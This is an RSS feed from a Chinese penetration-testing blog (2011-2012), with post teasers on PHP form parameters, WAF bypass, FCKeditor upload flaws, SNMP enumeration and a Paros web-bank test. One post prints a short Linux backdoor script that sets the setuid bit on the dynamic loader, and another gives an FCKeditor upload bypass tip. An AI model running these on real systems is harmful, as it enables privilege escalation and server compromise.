<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
	<channel>
		<title>WangJun's Blog</title>
		<link>http://www.wangjun.cn/</link>
		<description>美好的生活需要用心记录 关注计算机网络安全</description>
		<copyright>Powered by SaBlog-X. Copyright (C) 2003-2010.</copyright>
		<generator>SaBlog-X Version 2.0 Build 20100301</generator>
		<lastBuildDate>Thu, 23 Feb 2012 04:56:41 +0000</lastBuildDate>
		<ttl>30</ttl>
		<item>
			<link>http://www.wangjun.cn/archives/100/</link>
			<guid>http://www.wangjun.cn/archives/100/</guid>
			<title>PHP 获取Get POST提交表单的参数值</title>
			<author>897194@qq.com(wangjun)</author>
			<description><![CDATA[WangJun's Blog ( http://www.wangjun.cn/ ) : <p>
	&nbsp;</p>
<table align="center" border="0" cellpadding="6" cellspacing="0" style="border-bottom: #cccccc 1px dotted; border-left: #cccccc 1px dotted; table-layout: fixed; border-top: #cccccc 1px dotted; border-right: #cccccc 1px dotted" width="95%">
	<tbody>
		<tr>
			<td bgcolor="#f3f3f3" style="word-wrap: break-word">
				<p>
					<font style="color: #990000; font-weight: bold">PHP 获取 Get、POST 提交表单的参数值：</font></p>
				<p>
					PHP 获取 Get、POST 提交的参数值：</p>
				<p>
					<strong><font color="#ff0000">注意：函数 Get、POST 必须大写！</font></strong></p>
				<p>
					获取所有提交(<strong>区分参数大小写</strong>)：$_REQUEST[&#39;ip&#39;]</p>
				<p>
					获取Get提交(<strong>区分参数大小写</strong>)：$_GET[&#39;ip&#39;]</p>
				<p>
					获取Post提交(<strong>区分参数大小写</strong>)：$_POST[&#39;ip&#39;]</p>
				<p>
					使用示例：<br />
					&nbsp;&nbsp;&nbsp; 1、$ip = $_POST[&#39;ip&#39;];<br />
					&nbsp;&nbsp;&nbsp; 2、echo $_POST[&#39;ip&#39;];</p>
				<p>
					&nbsp;</p>
			</td>
		</tr>
	</tbody>
</table>
<p>
	转自 <a href="http://lcx.cc/?FoxNews=745.html">http://lcx.cc/?FoxNews=745.html</a></p>
]]></description>
			<link>http://www.wangjun.cn/archives/100/</link>
			<category domain="http://www.wangjun.cn/category/penetration/">渗透测试</category>
			<pubDate>Sat, 11 Feb 2012 17:00:19 +0000</pubDate>
		</item>
		<item>
			<link>http://www.wangjun.cn/archives/99/</link>
			<guid>http://www.wangjun.cn/archives/99/</guid>
			<title>如何测试XSS漏洞(转自淘测试)</title>
			<author>897194@qq.com(wangjun)</author>
			<description>文章需要输入密码才能浏览.</description>
			<link>http://www.wangjun.cn/archives/99/</link>
			<category domain="http://www.wangjun.cn/category/penetration/">渗透测试</category>
			<pubDate>Thu, 09 Feb 2012 11:27:33 +0000</pubDate>
		</item>
		<item>
			<link>http://www.wangjun.cn/archives/98/</link>
			<guid>http://www.wangjun.cn/archives/98/</guid>
			<title>常简单的Python HTTP服务(转)</title>
			<author>897194@qq.com(wangjun)</author>
			<description><![CDATA[WangJun's Blog ( http://www.wangjun.cn/ ) : <p>
	如果你急需一个简单的Web Server，但你又不想去下载并安装那些复杂的HTTP服务程序，比如：Apache，ISS等。那么， <a href="http://www.python.org/">Python</a> 可能帮助你。使用Python可以完成一个简单的内建 HTTP 服务器。于是，你可以把你的目录和文件都以HTTP的方式展示出来。佻只需要干一件事情，那就是安装一个Python。</p>
<p><a href="http://www.wangjun.cn/archives/98/" target="_blank">阅读全文</a></p>]]></description>
			<link>http://www.wangjun.cn/archives/98/</link>
			<category domain="http://www.wangjun.cn/category/technical/">技术相关</category>
			<pubDate>Thu, 26 Jan 2012 23:08:59 +0000</pubDate>
		</item>
		<item>
			<link>http://www.wangjun.cn/archives/97/</link>
			<guid>http://www.wangjun.cn/archives/97/</guid>
			<title>常用绕过防注入的11招</title>
			<author>897194@qq.com(wangjun)</author>
			<description><![CDATA[WangJun's Blog ( http://www.wangjun.cn/ ) : <p>
	在给一些公司做渗透的时候，经常遇到对方服务器前面架设有WAF的情况，也许最终不能成功利用sql注入漏洞，但至少能搞清楚目标服务器是不是有sql注入漏洞.</p>
<p><a href="http://www.wangjun.cn/archives/97/" target="_blank">阅读全文</a></p>]]></description>
			<link>http://www.wangjun.cn/archives/97/</link>
			<category domain="http://www.wangjun.cn/category/penetration/">渗透测试</category>
			<pubDate>Wed, 11 Jan 2012 17:31:26 +0000</pubDate>
		</item>
		<item>
			<link>http://www.wangjun.cn/archives/96/</link>
			<guid>http://www.wangjun.cn/archives/96/</guid>
			<title>IIS写权限的利用</title>
			<author>897194@qq.com(wangjun)</author>
			<description><![CDATA[WangJun's Blog ( http://www.wangjun.cn/ ) : <p>
	很老的一个东西，记录在这里主要是为了方便以后的工作。</p>
<p><a href="http://www.wangjun.cn/archives/96/" target="_blank">阅读全文</a></p>]]></description>
			<link>http://www.wangjun.cn/archives/96/</link>
			<category domain="http://www.wangjun.cn/category/penetration/">渗透测试</category>
			<pubDate>Tue, 10 Jan 2012 22:14:04 +0000</pubDate>
		</item>
		<item>
			<link>http://www.wangjun.cn/archives/95/</link>
			<guid>http://www.wangjun.cn/archives/95/</guid>
			<title>snmp信息的使用</title>
			<author>897194@qq.com(wangjun)</author>
			<description><![CDATA[WangJun's Blog ( http://www.wangjun.cn/ ) : <p>
	常用 SNMP 对象 ID</p>
<div>
	sysDescr.0 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1.3.6.1.2.1.1.1.0<br />
	sysObjectID.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1.3.6.1.2.1.1.2.0<br />
	sysUpTime.0 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1.3.6.1.2.1.1.3.0<br />
	sysContact.0 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1.3.6.1.2.1.1.4.0<br />
	sysName.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;1.3.6.1.2.1.1.5.0<br />
	sysLocation.0 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1.3.6.1.2.1.1.6.0<br />
	sysServices.0&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1.3.6.1.2.1.1.7.0<br />
	ifNumber.0 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1.3.6.1.2.1.2.1.0<br />
	tcpCurrEstab.0</div>
<div>
	&nbsp;</div>
<div>
	snmpget -v 2c -c public 192.168.21.159 sysName.0<br />
	获取设备的名字<br />
	&nbsp;</div>
<div>
	snmpwalk -v 2c -c public 192.168.21.159</div>
<div>
	遍历snmp树</div>
<div>
	&nbsp;</div>
<div>
	snmpstatus -v 2c -c public 192.168.21.159</div>
<div>
	获取简化的系统状态</div>
<div>
	&nbsp;</div>
<div>
	参考文章</div>
<div>
	<a href="http://www.ibm.com/developerworks/cn/aix/library/au-satsnmp/index.html">http://www.ibm.com/developerworks/cn/aix/library/au-satsnmp/index.html</a></div>
]]></description>
			<link>http://www.wangjun.cn/archives/95/</link>
			<category domain="http://www.wangjun.cn/category/technical/">技术相关</category>
			<pubDate>Fri, 06 Jan 2012 22:58:51 +0000</pubDate>
		</item>
		<item>
			<link>http://www.wangjun.cn/archives/94/</link>
			<guid>http://www.wangjun.cn/archives/94/</guid>
			<title>继续爆料:linux下留本地后门的两个方法(转)</title>
			<author>897194@qq.com(wangjun)</author>
			<description><![CDATA[WangJun's Blog ( http://www.wangjun.cn/ ) : <p>
	&nbsp;&nbsp;&nbsp; 公司某群中有人问 bash_profile 里PATH设置成 &quot;.&quot; 有啥危害，有人发了这篇文章出来，某大牛发了一段shell脚本。</p>
<p>
	#!/bin/sh</p>
<p>
	rm&nbsp;-f&nbsp;./ls<br />
	chmod&nbsp;4755&nbsp;/lib64/ld-linux-x86-64.so.2<br />
	/bin/ls</p>
<p>
	&nbsp;</p>
<p>
	<br />
	&nbsp;</p>
<p><a href="http://www.wangjun.cn/archives/94/" target="_blank">阅读全文</a></p>]]></description>
			<link>http://www.wangjun.cn/archives/94/</link>
			<category domain="http://www.wangjun.cn/category/technical/">技术相关</category>
			<pubDate>Thu, 05 Jan 2012 23:08:16 +0000</pubDate>
		</item>
		<item>
			<link>http://www.wangjun.cn/archives/93/</link>
			<guid>http://www.wangjun.cn/archives/93/</guid>
			<title>宅男的2012元旦假期</title>
			<author>897194@qq.com(wangjun)</author>
			<description><![CDATA[WangJun's Blog ( http://www.wangjun.cn/ ) : <p>
	&nbsp;&nbsp; 第一天，收到了网购的GALAXY Note和圣 jec iphone4/4S镜头3件套并重装了工作用的笔记本电脑，换上了64位win7系统。第二天，云舒在杨公堤曲苑风荷晒太阳喝茶的时候，我在百脑汇买内存条。第三天把2004-2008年左右的日志导入了现在这个地方。</p>
<p><a href="http://www.wangjun.cn/archives/93/" target="_blank">阅读全文</a></p>]]></description>
			<link>http://www.wangjun.cn/archives/93/</link>
			<category domain="http://www.wangjun.cn/category/life/">生活琐记</category>
			<pubDate>Tue, 03 Jan 2012 15:18:58 +0000</pubDate>
		</item>
		<item>
			<link>http://www.wangjun.cn/archives/9/</link>
			<guid>http://www.wangjun.cn/archives/9/</guid>
			<title>IOS5.0.1完美越狱成功</title>
			<author>897194@qq.com(wangjun)</author>
			<description><![CDATA[WangJun's Blog ( http://www.wangjun.cn/ ) : <p>
	今天晚上看到IOS5.0.1完美越狱放出，立刻进行了测试，到目前为止一切正常。过程比较简单，不过要先弄清楚什么是DFU模式。</p>
<p>
	&nbsp;</p>
<p>
	&nbsp;</p>
<p>
	<img alt="" src="http://www.wangjun.cn/images/iphone2.jpg" /></p>
<p><a href="http://www.wangjun.cn/archives/9/" target="_blank">阅读全文</a></p>]]></description>
			<link>http://www.wangjun.cn/archives/9/</link>
			<category domain="http://www.wangjun.cn/category/life/">生活琐记</category>
			<pubDate>Wed, 28 Dec 2011 00:17:00 +0000</pubDate>
		</item>
		<item>
			<link>http://www.wangjun.cn/archives/8/</link>
			<guid>http://www.wangjun.cn/archives/8/</guid>
			<title>fckeditor &lt;= 2.6.4 任意文件上传漏洞</title>
			<author>897194@qq.com(wangjun)</author>
			<description><![CDATA[WangJun's Blog ( http://www.wangjun.cn/ ) : <p>
	&nbsp;fckeditor &lt;= 2.6.4 任意文件上传漏洞</p>
<p><a href="http://www.wangjun.cn/archives/8/" target="_blank">阅读全文</a></p>]]></description>
			<link>http://www.wangjun.cn/archives/8/</link>
			<category domain="http://www.wangjun.cn/category/penetration/">渗透测试</category>
			<pubDate>Sun, 18 Dec 2011 18:26:01 +0000</pubDate>
		</item>
		<item>
			<link>http://www.wangjun.cn/archives/7/</link>
			<guid>http://www.wangjun.cn/archives/7/</guid>
			<title>解决Fckeditor删除所有上传页面如何上传入侵</title>
			<author>897194@qq.com(wangjun)</author>
			<description><![CDATA[WangJun's Blog ( http://www.wangjun.cn/ ) : <p>
	解决Fckeditor删除所有上传页面如何上传入侵</p>
<p>
	转载自：<a href="http://www.91ri.org/2641.html">http://www.91ri.org/2641.html</a></p>
<p><a href="http://www.wangjun.cn/archives/7/" target="_blank">阅读全文</a></p>]]></description>
			<link>http://www.wangjun.cn/archives/7/</link>
			<category domain="http://www.wangjun.cn/category/penetration/">渗透测试</category>
			<pubDate>Sun, 18 Dec 2011 17:02:40 +0000</pubDate>
		</item>
		<item>
			<link>http://www.wangjun.cn/archives/6/</link>
			<guid>http://www.wangjun.cn/archives/6/</guid>
			<title>Fckeditor漏洞利用方法总结</title>
			<author>897194@qq.com(wangjun)</author>
			<description><![CDATA[WangJun's Blog ( http://www.wangjun.cn/ ) : <p>
	From:http://huairen.me/archives/369.html</p>
<div>
	1.查看编辑器版本<br />
	FCKeditor/_whatsnew.html<br />
	=============================================================</div>
<div>
	2. Version 2.2 版本<br />
	Apache+linux 环境下在上传文件后面加个.突破！测试通过。<br />
	=============================================================</div>
<p><a href="http://www.wangjun.cn/archives/6/" target="_blank">阅读全文</a></p>]]></description>
			<link>http://www.wangjun.cn/archives/6/</link>
			<category domain="http://www.wangjun.cn/category/penetration/">渗透测试</category>
			<pubDate>Sun, 18 Dec 2011 12:17:51 +0000</pubDate>
		</item>
		<item>
			<link>http://www.wangjun.cn/archives/5/</link>
			<guid>http://www.wangjun.cn/archives/5/</guid>
			<title>Linux常用命令</title>
			<author>897194@qq.com(wangjun)</author>
			<description><![CDATA[WangJun's Blog ( http://www.wangjun.cn/ ) : <p>
	一些常用Linux命令，非常有用</p>
<p><a href="http://www.wangjun.cn/archives/5/" target="_blank">阅读全文</a></p>]]></description>
			<link>http://www.wangjun.cn/archives/5/</link>
			<category domain="http://www.wangjun.cn/category/technical/">技术相关</category>
			<comments>http://www.wangjun.cn/archives/5/#comments</comments>
			<pubDate>Mon, 17 Oct 2011 21:52:10 +0000</pubDate>
		</item>
		<item>
			<link>http://www.wangjun.cn/archives/4/</link>
			<guid>http://www.wangjun.cn/archives/4/</guid>
			<title>POST比GET安全？</title>
			<author>897194@qq.com(wangjun)</author>
			<description><![CDATA[WangJun's Blog ( http://www.wangjun.cn/ ) : <p>
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 最近有个项目是对某银行做渗透测试，找出潜在的安全漏洞。由于我们这里经验不足，渗透工作主要是总部研究院的同事做的。在他们提交的渗透测试报告中提到 &ldquo;大部分的POST请求都可直接转换为GET请求&rdquo; ，很明显是想说POST比GET安全。后来去银行做渗透测试结果交流的时候，银行的技术员问到为啥POST比GET安全。。一时不知道该从何说起，只知道GET提交的参数浏览器会缓存，如果通过GET提交帐号和密码进行登录，其他人查看浏览器的历史纪录，那么别人就可以拿到你的账号和密码了，但是现在基本上没有人用GET提交帐号和密码吧？另外web服务器的日志中也会有记录，&nbsp;HTTP头部的referer里会记下URL里请求数据。。基本上就这些。。说服力不是很强。回来后找了下资料，下面这篇文章讲得比较全面。应该是参考了网上一些资料后总结出来的。</p>
<p><a href="http://www.wangjun.cn/archives/4/" target="_blank">阅读全文</a></p>]]></description>
			<link>http://www.wangjun.cn/archives/4/</link>
			<category domain="http://www.wangjun.cn/category/technical/">技术相关</category>
			<pubDate>Sun, 09 Oct 2011 09:58:03 +0000</pubDate>
		</item>
		<item>
			<link>http://www.wangjun.cn/archives/3/</link>
			<guid>http://www.wangjun.cn/archives/3/</guid>
			<title>Paros终于正常工作了</title>
			<author>897194@qq.com(wangjun)</author>
			<description><![CDATA[WangJun's Blog ( http://www.wangjun.cn/ ) : <p>
	今天很开心..Paros终于可以截获目标网站的数据了.</p>
<p>
	因工作需要,需要对一个网银做渗透测试,主要是一些逻辑漏洞.比如能不能在自己的网银获取别人的网银的余额,转帐记录等.</p>
<p>
	于是安全了Paros, Paros的Trap功能很实用,可以截获封包并修改后再发送,相当于一次中间人攻击.Paros需要安装JAVA环境,于是安装了最新版本JDK 7.0</p>
<p>
	测试的过程中发现,别的https网站都能正常打开,只有目标网站不行.目标网站的端口不是默认的443,而是改成了另外的端口.因为对于https不熟悉,对证书也不了解.通过浏览器的提示,一直以为是证书的问题,或者是Paros只支持标准的https端口.后来注意到在尝试打开这个非标准端口的网站的时候会提示IO Error或通讯实败,才基本上确定是软件方面的问题(已经尝试了多个操作系统和浏览器).后来同事在他机器上试了下,正常!对比了一下环境,唯一的区别就是他的JDK是6.0.....果断换成JDK6.0..问题解决了.真的很意外,最新的JDK反而不支持了.<img alt="" height="24" src="http://blog.wangjun.cn/include/editor/plugins/smiley/images/1.gif" title="" width="24" />最新的不一定是最好的.</p>
]]></description>
			<link>http://www.wangjun.cn/archives/3/</link>
			<category domain="http://www.wangjun.cn/category/technical/">技术相关</category>
			<pubDate>Sat, 08 Oct 2011 23:50:39 +0000</pubDate>
		</item>
	</channel>
</rss>

